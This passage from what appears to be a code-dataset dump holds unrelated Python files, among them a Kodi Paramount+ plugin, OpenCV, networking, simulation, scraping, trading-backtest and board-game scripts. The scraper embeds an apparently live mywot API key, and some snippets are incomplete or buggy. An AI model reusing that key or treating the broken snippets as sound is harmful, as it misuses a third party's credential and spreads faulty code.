len(folder.items) == num_results:\n folder.add_item(\n label = _(_.NEXT_PAGE, page=page+1),\n path = plugin.url_for(movies, genre=genre, title=title, page=page+1),\n specialsort = 'bottom',\n )\n\n return folder\n\n@plugin.route()\ndef shows(group_id=None, **kwargs):\n if group_id is None:\n folder = plugin.Folder(_.SHOWS)\n\n for row in api.show_groups():\n folder.add_item(\n label = row['title'],\n path = plugin.url_for(shows, group_id=row['id']),\n )\n\n return folder\n\n data = api.show_group(group_id)\n\n folder = plugin.Folder(data['title'] + ' ({})'.format(data['totalShowGroupCount']))\n items = _process_shows(data['showGroupItems'])\n folder.add_items(items)\n\n return folder\n\ndef _process_shows(rows):\n items = []\n\n for row in rows:\n plot = _(_.EPISODE_COUNT, count=row['episodeVideoCount']['totalEpisodes'])\n # if row['episodeVideoCount']['totalClips']:\n # plot += '\\n'+ _(_.CLIPS_COUNT, count=row['episodeVideoCount']['totalClips'])\n\n item = plugin.Item(\n label = row['title'],\n info = {\n 'genre': row['category'],\n 'mediatype': 'tvshow',\n 'plot': plot,\n },\n art = {'thumb': config.image(row['showAssets']['filepath_show_browse_poster']), 'fanart': config.image(row['showAssets']['filepath_brand_hero'], 'w1920-q80')},\n path = plugin.url_for(show, show_id=row['showId']),\n )\n\n items.append(item)\n\n return items\n\n@plugin.route()\ndef show(show_id, **kwargs):\n show = api.show(show_id)\n\n folder = plugin.Folder(show['show']['results'][0]['title'], thumb=config.image(show['showAssets']['filepath_show_browse_poster']), fanart=config.image(show['showAssets']['filepath_brand_hero'], 'w1920-q80'))\n\n plot = show['show']['results'][0]['about'] + '\\n\\n'\n\n clip_count = 0\n for row in sorted(api.seasons(show_id), key=lambda x: int(x['seasonNum'])):\n clip_count += row['clipsCount']\n if not row['totalCount']:\n continue\n\n folder.add_item(\n label = _(_.SEASON, season=row['seasonNum']),\n info = {\n 'plot': plot + _(_.EPISODE_COUNT, count=row['totalCount']),\n 'mediatype': 'season',\n 'tvshowtitle': show['show']['results'][0]['title'],\n },\n path = plugin.url_for(season, show_id=show_id, season=row['seasonNum']),\n )\n\n # if clip_count:\n # folder.add_item(\n # label = _.CLIPS,\n # info = {\n # 'plot': plot + _(_.CLIPS_COUNT, count=clip_count),\n # }\n # )\n\n return folder\n\n@plugin.route()\ndef season(show_id, season, **kwargs):\n show = api.show(show_id)\n\n folder = plugin.Folder(show['show']['results'][0]['title'], fanart=config.image(show['showAssets']['filepath_brand_hero'], 'w1920-q80'))\n\n for row in api.episodes(show_id, season):\n folder.add_item(\n label = row['label'].strip() or row['title'].strip(),\n info = {\n 'aired': row['_airDateISO'],\n 'dateadded': row['_pubDateISO'],\n 'plot': row['shortDescription'],\n 'season': row['seasonNum'],\n 'episode': row['episodeNum'],\n 'duration': row['duration'],\n 'genre': row['topLevelCategory'],\n 'mediatype': 'episode',\n 'tvshowtitle': show['show']['results'][0]['title'],\n },\n art = {'thumb': config.thumbnail(row['thumbnail'])},\n path = plugin.url_for(play, video_id=row['contentId']),\n playable = True,\n )\n\n return folder\n\n@plugin.route()\ndef live_tv(**kwargs):\n folder = plugin.Folder(_.LIVE_TV)\n\n now = arrow.utcnow()\n\n for row in api.live_channels():\n if not row['currentListing'] or (not row['dma'] and not row['currentListing'][-1]['contentCANVideo'].get('liveStreamingUrl')):\n continue\n\n plot = u''\n for listing in row['currentListing']:\n start = arrow.get(listing['startTimestamp'])\n end = arrow.get(listing['endTimestamp'])\n if (now > start and now < end) or start > now:\n plot += u'[{} - {}]\\n{}\\n'.format(start.to('local').format('h:mma'), end.to('local').format('h:mma'), listing['title'])\n\n folder.add_item(\n label = row['channelName'],\n info = {\n 'plot': plot.strip('\\n'),\n },\n art = {'thumb': config.image(row['filePathLogoSelected'])},\n path = plugin.url_for(play_channel, slug=row['slug'], _is_live=True),\n playable = True,\n )\n\n return folder\n\n@plugin.route()\ndef search(query=None, **kwargs):\n if not query:\n query = gui.input(_.SEARCH, default=userdata.get('search', '')).strip()\n if not query:\n return\n\n userdata.set('search', query)\n\n folder = plugin.Folder(_(_.SEARCH_FOR, query=query))\n\n for row in api.search(query):\n if row['term_type'] == 'show':\n folder.add_item(\n label = row['title'],\n info = {\n 'mediatype': 'tvshow',\n },\n art = {'thumb': config.image(row['showAssets']['filepath_show_browse_poster']), 'fanart': config.image(row['showAssets']['filepath_brand_hero'], 'w1920-q80')},\n path = plugin.url_for(show, show_id=row['show_id']),\n )\n\n elif row['term_type'] == 'movie':\n data = row['videoList']['itemList'][0]\n\n folder.add_item(\n label = data['label'].strip() or data['title'].strip(),\n info = {\n 'plot': data.get('shortDescription', data['description']),\n 'aired': str(arrow.get(data['airDate'])),\n 'duration': data['duration'],\n 'mediatype': 'movie',\n 'trailer': plugin.url_for(play, video_id=row['movie_trailer_id']) if row.get('movie_trailer_id') else None,\n },\n art = {'thumb': _get_thumb(data['thumbnailSet']), 'fanart': _get_thumb(data['thumbnailSet'], 'Thumbnail')},\n path = plugin.url_for(play, video_id=data['contentId']),\n playable = True,\n )\n\n return folder\n\n@plugin.route()\ndef login(**kwargs):\n if config.has_device_link and gui.yes_no(_.LOGIN_WITH, yeslabel=_.DEVICE_LINK, nolabel=_.EMAIL_PASSWORD):\n result = _device_link()\n else:\n result = _email_password()\n\n if not result:\n return\n\n _select_profile()\n gui.refresh()\n\ndef _email_password():\n username = gui.input(_.ASK_USERNAME, default=userdata.get('username', '')).strip()\n if not username:\n return\n\n userdata.set('username', username)\n\n password = gui.input(_.ASK_PASSWORD, hide_input=True).strip()\n if not password:\n return\n\n api.login(username=username, password=password)\n\n return True\n\ndef _device_link():\n start = time.time()\n data = api.device_code()\n monitor = xbmc.Monitor()\n\n poll_time = int(data['retryInterval']/1000)\n max_time = int(data['retryDuration']/1000)\n device_token = data['deviceToken']\n code = data['activationCode']\n\n with gui.progress(_(_.DEVICE_LINK_STEPS, url=config.device_link_url, code=code), heading=_.DEVICE_LINK) as progress:\n while (time.time() - start) < max_time:\n for i in range(poll_time):\n if progress.iscanceled() or monitor.waitForAbort(1):\n return\n\n progress.update(int(((time.time() - start) / max_time) * 100))\n\n result = api.device_login(code, device_token)\n if result:\n return True\n\n elif result == -1:\n return False\n\n@plugin.route()\ndef select_profile(**kwargs):\n _select_profile()\n gui.refresh()\n\ndef _select_profile():\n profiles = api.user()['accountProfiles']\n\n values = []\n options = []\n default = -1\n for index, profile in enumerate(profiles):\n values.append(profile['id'])\n options.append(plugin.Item(label=profile['name'], art={'thumb': config.image(profile['profilePicPath'])}))\n if profile['id'] == userdata.get('profile_id'):\n default = index\n\n index = gui.select(_.SELECT_PROFILE, options=options, preselect=default, useDetails=True)\n if index < 0:\n return\n\n api.set_profile(values[index])\n gui.notification(_.PROFILE_ACTIVATED, heading=userdata.get('profile_name'), icon=config.image(userdata.get('profile_img')))\n\ndef _get_thumb(thumbs, _type='PosterArt'):\n if not thumbs:\n return None\n\n for row in thumbs:\n if row['assetType'] == _type:\n return config.thumbnail(row['url'])\n\n return None\n\ndef _parse_item(row):\n if row['mediaType'] == 'Standalone':\n row['mediaType'] = 'Movie'\n elif row['mediaType'] == 'Clip':\n row['mediaType'] = 'Trailer'\n\n if row['mediaType'] in ('Movie', 'Trailer'):\n return plugin.Item(\n label = row['title'],\n info = {\n 'aired': row['_airDateISO'],\n 'dateadded': row['_pubDateISO'],\n 'genre': row['genre'],\n 'plot': row['shortDescription'],\n 'duration': row['duration'],\n 'mediatype': 'movie' if row['mediaType'] == 'Movie' else 'video',\n },\n art = {'thumb': _get_thumb(row['thumbnailSet'], 'Thumbnail') if row['mediaType'] == 'Trailer' else _get_thumb(row['thumbnailSet'])},\n )\n\n return plugin.Item()\n\n@plugin.route()\n@plugin.plugin_callback()\ndef mpd_request(_data, _data_path, **kwargs):\n root = parseString(_data)\n\n dolby_vison = settings.getBool('dolby_vision', False)\n h265 = settings.getBool('h265', False)\n enable_4k = settings.getBool('4k_enabled', True)\n enable_ac3 = settings.getBool('ac3_enabled', False)\n enable_ec3 = settings.getBool('ec3_enabled', False)\n enable_accessibility = settings.getBool('accessibility_enabled', False)\n\n for elem in root.getElementsByTagName('Representation'):\n parent = elem.parentNode\n codecs = elem.getAttribute('codecs').lower()\n height = int(elem.getAttribute('height') or 0)\n width = int(elem.getAttribute('width') or 0)\n\n if not dolby_vison and (codecs.startswith('dvhe') or codecs.startswith('dvh1')):\n parent.removeChild(elem)\n\n elif not h265 and (codecs.startswith('hvc') or codecs.startswith('hev')):\n parent.removeChild(elem)\n\n elif not enable_4k and (height > 1080 or width > 1920):\n parent.removeChild(elem)\n\n elif not enable_ac3 and codecs == 'ac-3':\n parent.removeChild(elem)\n\n elif not enable_ec3 and codecs == 'ec-3':\n parent.removeChild(elem)\n\n for adap_set in root.getElementsByTagName('AdaptationSet'):\n if not adap_set.getElementsByTagName('Representation') or \\\n (not enable_accessibility and adap_set.getElementsByTagName('Accessibility')):\n adap_set.parentNode.removeChild(adap_set)\n\n with open(_data_path, 'wb') as f:\n f.write(root.toprettyxml(encoding='utf-8'))\n\n return _data_path\n\n@plugin.route()\n@plugin.login_required()\ndef play(video_id, **kwargs):\n url, license_url, token, data = api.play(video_id)\n\n item = _parse_item(data)\n item.proxy_data['manifest_middleware'] = plugin.url_for(mpd_request)\n\n headers = {\n 'authorization': 'Bearer {}'.format(token),\n }\n\n item.update(\n path = url,\n headers = headers,\n inputstream = inputstream.Widevine(\n license_key = license_url,\n ),\n )\n\n return item\n\n@plugin.route()\n@plugin.login_required()\ndef play_channel(slug, **kwargs):\n channels = api.live_channels()\n\n for row in channels:\n if row['slug'] == slug:\n if row['dma']:\n play_path = row['dma']['playback_url']\n elif row['currentListing']:\n play_path = row['currentListing'][0]['contentCANVideo']['liveStreamingUrl']\n else:\n raise Exception('No url found for this channel')\n\n return plugin.Item(\n label = row['channelName'],\n info = {\n 'plot': row['description'],\n },\n art = {'thumb': config.image(row['filePathLogoSelected'])},\n path = play_path,\n inputstream = inputstream.HLS(live=True),\n )\n\n raise Exception('Unable to find that channel')\n\n@plugin.route()\ndef logout(**kwargs):\n if not gui.yes_no(_.LOGOUT_YES_NO):\n return\n\n api.logout()\n gui.refresh()\n\n@plugin.route()\n@plugin.merge()\ndef playlist(output, **kwargs):\n with codecs.open(output, 'w', encoding='utf8') as f:\n f.write(u'#EXTM3U\\n')\n\n for row in api.live_channels():\n if not row['currentListing'] or len(row['currentListing']) > 1:\n continue\n\n f.write(u'#EXTINF:-1 tvg-id=\"{id}\" tvg-name=\"{name}\" tvg-logo=\"{logo}\",{name}\\n{path}\\n'.format(\n id=row['slug'], name=row['channelName'], logo=config.image(row['filePathLogoSelected']), path=plugin.url_for(play_channel, slug=row['slug'], _is_live=True)))\n\n@plugin.route()\n@plugin.merge()\ndef epg(output, **kwargs):\n channels = api.live_channels()\n now = arrow.now()\n until = now.shift(days=settings.getInt('epg_days', 3))\n\n with codecs.open(output, 'w', encoding='utf8') as f:\n f.write(u'')\n\n for channel in api.live_channels():\n if not channel['currentListing'] or (not channel['dma'] and not channel['currentListing'][-1]['contentCANVideo'].get('liveStreamingUrl')):\n continue\n\n f.write(u''.format(id=channel['slug']))\n\n page = 1\n stop = now\n while stop < until:\n rows = api.epg(channel['slug'], rows=100, page=page)\n page += 1\n if not rows:\n break\n\n for row in rows:\n start = arrow.get(row['startTimestamp'])\n stop = arrow.get(row['endTimestamp'])\n\n icon = u''.format(config.image(row['filePathThumb'])) if row['filePathThumb'] else ''\n desc = u'{}'.format(escape(row['description'])) if row['description'] else ''\n\n f.write(u'{title}{desc}{icon}'.format(\n id=channel['slug'], start=start.format('YYYYMMDDHHmmss Z'), stop=stop.format('YYYYMMDDHHmmss Z'), title=escape(row['title']), desc=desc, icon=icon,\n ))\n\n f.write(u'')\n","sub_path":"slyguy.paramount.plus/resources/lib/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":21066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"651446311","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('img_laplacian.jpg',0)\nimg2 = cv2.imread('referencia.jpg')\nkernel = np.ones((1,1),np.uint8)\n\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\nblur = cv2.GaussianBlur(opening,(3,3),0)\n\nret3,th4 = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU) \nlaplacian = cv2.Laplacian(th4,cv2.CV_8UC1)\ncst = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)\nminLineLength = 150\nmaxLineGap = 30\nlines = cv2.HoughLinesP(laplacian,1,np.pi/180,100,minLineLength,maxLineGap)\nfor line in lines: \n for x1,y1,x2,y2 in line:\n cv2.line(img2,(x1 + 1000,y1),(x2 - 5000,y2),(0,0,255),1)\n\ncv2.imwrite('linesDetected_laplacian.jpg',img2)","sub_path":"OpenCv_algoritmos/Hough-Transform/plant+lineDetect/houghTransform_laplacian.py","file_name":"houghTransform_laplacian.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"164509569","text":"from helpFunc import *\nimport struct,uuid\n\nclass streamBase():\n def __init__(self,upper,rate,pushAhead,packLimit,isServer):\n self.upper = upper\n self.staTime = 0\n self.sendPackMap = {}\n self.recPackMap = {}\n self.sendSelfPos = 0\n self.sendPeerPos = 0\n self.recPos = 0\n self.sendStatusRate = rate\n self.notRecInfo = {}\n self.peerNotRecInfo = {} \n self.sockMap = {}\n self.statusGapTime = float('inf')\n self.pushAhead = pushAhead\n l = circleRange(0,self.pushAhead)\n for i in l:\n self.notRecInfo[i]=0\n self.newPeerTime = -float('inf')\n self.peerMyTime = -float('inf')\n self.hasStart = False\n self.maxSend = 1\n self.slope = 1\n self.packLimit = packLimit\n self.updatedTime = getRunningTime()\n self.calStaNum = 0\n self.waitingTime = 0\n self.rRaw = self.wRaw = self.rNet = self.wNet = 0\n self.totalRec = self.blankRec = self.totalSend = self.blankSend = self.statusSend = self.statusRev = 0 \n self.isServer = isServer\n self.maxSendL = {}\n self.maxRec = {}\n self.peerMaxSend = {}\n self.peerMaxRec = {}\n \n def getLog(self):\n s = '[raw,net](r/w) %s %s %s %s [n/s/t](r/w) %s %s %s %s %s %s [rate,slope,max] %2.2f %s %s'%\\\n (int(self.rRaw/1024),int(self.wRaw/1024),int(self.rNet/1024),int(self.wNet/1024),\\\n self.blankRec,self.blankSend,self.statusRev,self.statusSend,self.totalRec,self.totalSend,\\\n self.sendStatusRate,self.slope,self.maxSend)\n return s\n \n def dealStatusBack(self,re):\n self.updatedTime = getRunningTime()\n s = structWrapper(re)\n s.readByte()\n peerTime = s.readDouble()\n if peerTimecon_streamBufferSize:\n break\n s .append( self.recPackMap[one])\n bufferL += len(self.recPackMap[one])\n del self.recPackMap[one]\n self.recPos = circleAddOne(one)\n self.notRecInfo[circleAdd(one,self.pushAhead)] = 0\n \n if s or self.upper.readBuffer:\n ss = b''.join(s) \n self.rNet += len(ss)\n self.upper.readBuffer += ss \n self.upper.ioloop.add_callback(self.rCallback) \n self.upper.readLock.release() \n \n def write(self):\n if not self.hasStart:\n return \n \n self.upper.writeLock.acquire() \n lB = len(self.upper.writeBuffer)\n newPos = 0 \n while True:\n if lB == 0:\n break\n if circleBig(circleAdd(self.sendPeerPos,self.pushAhead),self.sendSelfPos) == self.sendSelfPos: \n break \n s1 = self.upper.writeBuffer[newPos:newPos+self.packLimit]\n\n newPos += self.packLimit\n self.sendPackMap[self.sendSelfPos] = {'sendRecording':{},'con':s1}\n self.wNet += len(s1)\n self.sendSelfPos = circleAddOne(self.sendSelfPos)\n if newPos>=lB:\n break\n \n self.upper.writeBuffer = self.upper.writeBuffer[newPos:]\n if not self.upper.writeBuffer:\n self.upper.ioloop.add_callback(self.wCallback) \n self.upper.writeLock.release() \n \n def get_data_to_send(self,n):\n self.totalSend += n\n self.clearRecording()\n if not self.hasStart:\n statusNum = n\n else:\n self.calStaNum += n\n statusNum = int(self.calStaNum*self.sendStatusRate)\n if statusNum>n:\n statusNum=n\n self.calStaNum-=statusNum/self.sendStatusRate\n st = self.getOneStatus()\n l = self.findNPack(n-statusNum)\n self.statusSend += statusNum\n ret = []\n for i in range(statusNum):\n ret.append(st)\n ret = ret+l\n for i in range(n-statusNum-len(l)):\n re = struct.pack('b',2)\n ret.append(re)\n self.blankSend += 1\n return ret\n\n def getOneStatus(self):\n re = struct.pack('b',0)\n re += struct.pack('d',getRunningTime())\n re += struct.pack('d',self.newPeerTime)\n re += struct.pack('d',self.sendStatusRate)\n re += struct.pack('d',self.slope)\n re += struct.pack('d',self.maxSend)\n re += struct.pack('d',self.waitingTime) \n re += struct.pack('H',getPackStaBigV(self.maxSendL)) \n re += struct.pack('H',getPackStaBigV(self.maxRec)) \n re += struct.pack('H',self.recPos) \n co = 0\n ss = '' \n l = circleRange(self.recPos,circleAdd(self.recPos,self.pushAhead))\n for i in l:\n if i not in self.notRecInfo:\n ss+='0'\n else:\n ss+='1'\n co += 1\n if co==8:\n re += struct.pack('B',int(ss,2)) \n co = 0\n ss = '' \n ss += (8-len(ss))*'0'\n re += struct.pack('B',int(ss,2)) \n return re\n \n def clearRecording(self):\n for i in circleRange(self.sendPeerPos,self.sendSelfPos):\n if i not in self.peerNotRecInfo:\n continue\n m = self.sendPackMap[i]['sendRecording']\n for k in list(m.keys()):\n v = m[k]\n if v0.5)+(X[_, 1]>0.5)\n\nFIELDS = {\"InsertionTime\": numpy.zeros((N, 1)),\n \"OriginalGyre\": orig_gyre }\n\n# buckets hold collections of particles\n# drive the system from there\n\nPB = pm.Particles.ParticleBucket(X, V, time=0.0, delta_t=5.0e-4,\n system=SYSTEM,\n parameters=PAR,\n field_data=FIELDS,\n online=False,\n pos_callbacks=[rwalk,conservation_correction])\n#time is start time, delta_t is timestep. Setting online only matters in parallel\n\n#example of setting field data in script, iterate over bucket\n\nfor particle in PB:\n particle.fields[\"ExampleLevel\"] = 1.0\n\nPD = pm.IO.PolyData(NAME+'_trajectories', \n {\"InsertionTime\":1,\n \"OriginalGyre\":1,\n \"ExampleLevel\":1}) # This holds trajectory information\n# output format is dictionary, key is name, value is length\n\nPD.append_data(PB) # Store initial particle positions\n\nfor i, cache in enumerate(TEMP_CACHE):\n\n print('time', cache[0])\n\n # call which updates the particles\n PB.run(time=cache[0], write=False, method=\"AdamsBashforth2\")\n\n # lets explicitly insert a new particle\n xx = numpy.array((0.3, 0.1, 0.0)) # Space is always 3d: in 2d z component is zero\n vv = TEMP_CACHE.get_velocity(xx, PB.time) # Same for velocity.\n part = pm.Particles.Particle((xx, vv, PB.time, PB.delta_t),\n system=SYSTEM,\n parameters=PAR,\n pos_callbacks=[rwalk, conservation_correction]) # Make a new particle\n part.fields[\"InsertionTime\"] = part.time # set its insertion time\n part.fields[\"OriginalGyre\"] = 0.0\n if pm.Parallel.get_rank() == 0:\n PB.particles.append(part) # Stick it in the bucket\n \n #example of setting field data inside script\n for particle in PB:\n t = particle.time\n t_0 = particle.fields[\"InsertionTime\"]\n particle.fields[\"ExampleLevel\"] = numpy.exp(-(t-t_0)**2)\n\n pm.IO.write_level_to_csv(bucket=PB, level=i, basename=NAME+'_%s'%kap,\n field_data={\"InsertionTime\":1,\n \"OriginalGyre\":1,\n \"ExampleLevel\":1}) # Dump just this timelevel\n pm.IO.write_level_to_polydata(bucket=PB, level=i, basename=NAME+'_%s'%kap,\n field_data={\"InsertionTime\":1,\n \"OriginalGyre\":1,\n \"ExampleLevel\":1}) # Dump just this timelevel\n PD.append_data(PB)\n\n print('min, max: pos_x', PB.pos_as_array()[:, 0].min(), PB.pos_as_array()[:, 0].max())\n print('min, max: pos_y', PB.pos_as_array()[:, 1].min(), PB.pos_as_array()[:, 1].max())\n print('min, max: vel_x', PB.vel_as_array()[:, 0].min(), PB.vel_as_array()[:, 0].max())\n print('min, max: vel_y', PB.vel_as_array()[:, 1].min(), PB.vel_as_array()[:, 1].max())\n\nPD.write() # write trajectories\n","sub_path":"examples/langevin/pm.py","file_name":"pm.py","file_ext":"py","file_size_in_byte":5443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"156756937","text":"from PIL import Image # Image -> 클래스, 대문자로 시작, 스태틱메소드(생성 안 하고 바로 호출), 팩토리함수, 객체의 생성 과정 쉽게\n\n# open image\nim = Image.open(\"cute_cat.jpg\") # 이미지객체의 인스턴스 = im\n\nprint(im.size)\n\nim.save(\"cute_cat.png\") # png로 저장\n\nim.show()\n","sub_path":"python/test/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"201979457","text":"import random\n\n\nclass PigMoves(Opponent):\n\n def decision(self):\n if self.count > 0:\n return \"hold\"\n elif self.score == 0 and self.count > 0:\n return \"bust\"\n else:\n self.count += 1\n return \"roll\"\n\nclass Game2(Game):\n\n def __init__(self):\n self.p1 = Player()\n self.p2 = Opponent()\n self.round_count = 0\n\n def pick_first(self):\n guess = input(\"Pick heads or tails. \").lower()\n coin_toss = random.choice(['heads', 'tails'])\n if guess == coin_toss:\n print(\"You go first.\")\n return True\n elif guess != 'heads' and guess != 'tails':\n print(\"Fine, wise guy. Your opponent goes first\")\n return False\n else:\n print(\"Your opponent goes first.\")\n return False\n\n def p1_turn(self):\n self.p1.roll_or_hold()\n\n def p2_turn(self):\n self.p2.roll_or_hold()\n\n def play_round_me(self):\n self.p1_turn()\n self.p2_turn()\n\n def play_round_you(self):\n self.p2_turn()\n self.p1_turn()\n\n def full_game(self):\n pick = self.pick_first()\n if pick == True:\n while self.round_count < 7:\n self.play_round_me()\n self.round_count += 1\n self.win_lose()\n if pick == False:\n while self.round_count < 7:\n self.play_round_you()\n self.round_count += 1\n self.win_lose()\n\n def win_lose(self):\n if self.p1.total_score > self.p2.total_score:\n return \"YOU WIN! Final score is {}, to {}.\".format(\n self.p1.total_score, self.p2.total_score)\n else:\n return \"YOU LOSE! Final score is {}, to {}.\".format(\n self.p1.total_score, self.p2.total_score)\n\nplay_game = Game()\nplay_game.full_game()\n","sub_path":"pig_move_opponent.py","file_name":"pig_move_opponent.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"195143459","text":"from newspaper import Article\nfrom textblob import TextBlob\nfrom textatistic import Textatistic\nimport urllib.request\nimport re\nimport pandas as pd\nimport requests\nfrom urllib.parse import urlsplit\nimport time\nimport os\n\ndef conv(s):\n try:\n return int(s)\n except ValueError:\n return s\n\ndf=pd.read_csv('enk.csv')\nquery = df[\"url\"].values\n#query =[\"https://en.wikipedia.org/wiki/Vaccine\" , \"https://en.wikipedia.org/wiki/Vaccine\"]\nfor i in range(len(query)):\n try:\n article = Article(query[i])\n article.download()\n article.parse()\n text = article.text\n blob = TextBlob ( text )\n s = Textatistic ( text )\n afb = len(article.images)\n vals = requests.get ( query[i] , timeout=4 , allow_redirects=False ).elapsed.total_seconds ( )\n st = \"/&callback=process&key=57bf606e01a24537ac906a86dc27891f94a0f587\"\n # zz = urlopen ( url )\n quez = 'http://api.mywot.com/0.4/public_link_json2?hosts=' + query[i] + st\n stt = urllib.request.urlopen ( quez ).read ( )\n stt = str ( stt )\n wot = re.findall ( '\\d+' , stt )\n ##z=[[conv(s) for s in line.split()] for line in wot]\n z = [ conv ( s ) for s in wot ]\n high = (z[ 1 ])\n low = (z[ 2 ])\n zz = \"{0.scheme}://{0.netloc}/\".format ( urlsplit ( query[i] ) )\n zurlz = \"https://web.archive.org/web/0/\" + str ( zz )\n r = requests.get ( zurlz , allow_redirects=False )\n data = r.content\n years = re.findall ( '\\d+' , str ( data ) )\n years = [ conv ( s ) for s in years ]\n years = (years[ 0 ])\n years = int ( str ( years )[ :4 ] )\n cols = {'yeararchive': [ years ] ,\n 'lowwot': [ low ] ,\n 'highwot': [ high ] ,\n 'reponsetime': [ vals ] ,\n 'wordcount': [ s.word_count ] ,\n 'subjectivity': [ blob.sentiment.subjectivity ],\n 'polarity': [ blob.sentiment.polarity ] ,\n 'fleschscore': [ s.flesch_score ],\n 'pictures': [afb],\n #'kw': [ kw ] ,\n 'url': [ query[i] ]}\n df = pd.DataFrame.from_dict ( cols )\n #df.to_csv('ozzy.csv', index=False)\n\n if not os.path.isfile('ft.csv'):\n df.to_csv('ft.csv', index=False)\n else: # else it exists so append without writing the header\n df.to_csv('ft.csv', mode='a', header=False, index=False)\n\n time.sleep(2)\n except:\n pass\n\n#na bestanden\nb = pd.read_csv(\"ft.csv\")#labels\na = pd.read_csv(\"lab.csv\")#features moet headers hebben\nmerged = a.merge(b, on='url', how='inner')\n#del merged['urlz']\nmerged.to_csv(\"mjoined.csv\", index=False)\n","sub_path":"collect/collect.py","file_name":"collect.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"38692360","text":"#!/usr/bin/python\n\n# Simple example of some supporting classes for a\n# moving average crossover system\n\n# Also see the __init__.py where these are registered with names in\n# the EntryManagerRegistry and ExitManagerRegistry\n\nfrom backtest.entrymanager import EntryManager\nfrom backtest.exitmanager import ExitManager\nfrom backtest.strategy import Trade\nfrom indicators.indicators import SimpleMovingAverage, AdjustedClose\n\n\nclass MACrossoverEntryManager(EntryManager):\n \"\"\" Enter on cross higher of the fast ma over the slow ma \"\"\"\n\n def __init__(self, settings, name=None):\n EntryManager.__init__(self, settings, name=name)\n\n fastma = settings.getint(\"MACrossoverEntryManager\", \"fastma\")\n slowma = settings.getint(\"MACrossoverEntryManager\", \"slowma\")\n\n # AdjustedClose is adjusted for splits and dividends\n self.close = AdjustedClose()\n self.fastma = SimpleMovingAverage(metric=self.close, period=fastma)\n self.slowma = SimpleMovingAverage(metric=self.close, period=slowma)\n\n # add the metrics to the entry manager, this will cause them\n # to automatically handle the stream of bar data\n self._addMetric(self.close)\n self._addMetric(self.fastma)\n self._addMetric(self.slowma)\n\n def checkTrade(self, trade):\n if trade is not None:\n # we don't scale in additional size, already in a trade\n return trade\n if self.fastma.ready() and self.slowma.ready() \\\n and self.fastma.value() > self.slowma.value() \\\n and self.close.value() > 0:\n # new trade\n entry = self.close.value()\n # no stops for this simple strategy\n stop = 0.0\n # note, self.periodData is the last bar seen, this is provided from\n # the base class EntryManager\n trade = Trade(self.periodData.stock, self.periodData.date, entry, stop)\n return trade\n return None\n\n\nclass MACrossoverExitManager(ExitManager):\n \"\"\" Exit on a downard cross of a fast ma through a slow ma.\n\n This only handles long trades\n \"\"\"\n\n def __init__(self, settings):\n ExitManager.__init__(self)\n\n fastma = settings.getfloat(\"MACrossoverExitManager\", \"fastma\")\n slowma = settings.getfloat(\"MACrossoverExitManager\", \"slowma\")\n self.close = AdjustedClose()\n self.fastma = SimpleMovingAverage(metric=self.close, period=fastma)\n self.slowma = SimpleMovingAverage(metric=self.close, period=slowma)\n\n # add the metrics to the entry manager, this will cause them\n # to automatically handle the stream of bar data\n self._addMetric(self.close)\n self._addMetric(self.fastma)\n self._addMetric(self.slowma)\n\n def checkTrade(self, trade):\n if trade is not None and self.fastma.ready() and self.slowma.ready() \\\n and trade.exit is None \\\n and self.fastma.value() < self.slowma.value():\n trade.exit = self.perioddata.date\n trade.exitPrice = self.perioddata.adjustedClose\n\n return trade\n","sub_path":"user-backtests/userbacktests/macrossover.py","file_name":"macrossover.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"77363212","text":"import numpy as np\n\nBOARD_SIZE = 6\n\nMANCALA_A = BOARD_SIZE\nMANCALA_B = 2*BOARD_SIZE + 1\n\nDRAW = -1\nPLAYER_A = 0\nPLAYER_B = 1\n\nSTARTING_SEEDS = 3\nTOTAL_SEEDS = BOARD_SIZE*STARTING_SEEDS*2\n\nclass mancala():\n def player_letter(self, player):\n if player == PLAYER_A:\n return 'A'\n else:\n return 'B'\n\n def holes(self, player):\n if player == PLAYER_A:\n return self.board[:BOARD_SIZE]\n else:\n return self.board[BOARD_SIZE+1:-1]\n\n def hole_indices(self, player):\n if player == PLAYER_A:\n return np.arange(BOARD_SIZE)\n else:\n return np.arange(BOARD_SIZE+1, 2*BOARD_SIZE + 1)\n\n def mancala(self, player):\n if player == PLAYER_A:\n return self.board[BOARD_SIZE]\n else:\n return self.board[-1]\n\n def add_holes(self, a, b):\n # Hole addition (wraps around the board)\n return (a + b) % (2*BOARD_SIZE + 2)\n\n def opposite_hole(self, h):\n # Find the opposite hole on the board\n return self.add_holes(h, -2 * (h % (BOARD_SIZE + 1)) - 2)\n\n def winning_player(self):\n if self.mancala(PLAYER_A) > self.mancala(PLAYER_B):\n return PLAYER_A\n elif self.mancala(PLAYER_B) > self.mancala(PLAYER_A):\n return PLAYER_B\n else:\n return DRAW\n\n def valid_moves(self):\n # Array of valid moves\n if self.completed():\n return None\n # Get player's holes\n holes = self.holes(self.turn)\n # Can only move where hole is not empty\n return np.where(holes > 0)[0]\n\n def opponent(self):\n if self.turn == PLAYER_A:\n return PLAYER_B\n else:\n return PLAYER_A\n\n def display_player(self, player):\n # Visualise the board as text, from player's perspective\n if player == PLAYER_A:\n this_player = PLAYER_A\n other_player = PLAYER_B\n else:\n this_player = PLAYER_B\n other_player = PLAYER_A\n fmt = ' {} ' + '|{:^3}'*BOARD_SIZE + '|###'\n print(fmt.format(self.player_letter(other_player),\n *self.holes(other_player)[::-1])) # Other player backwards\n fmt = '{:^3}' + 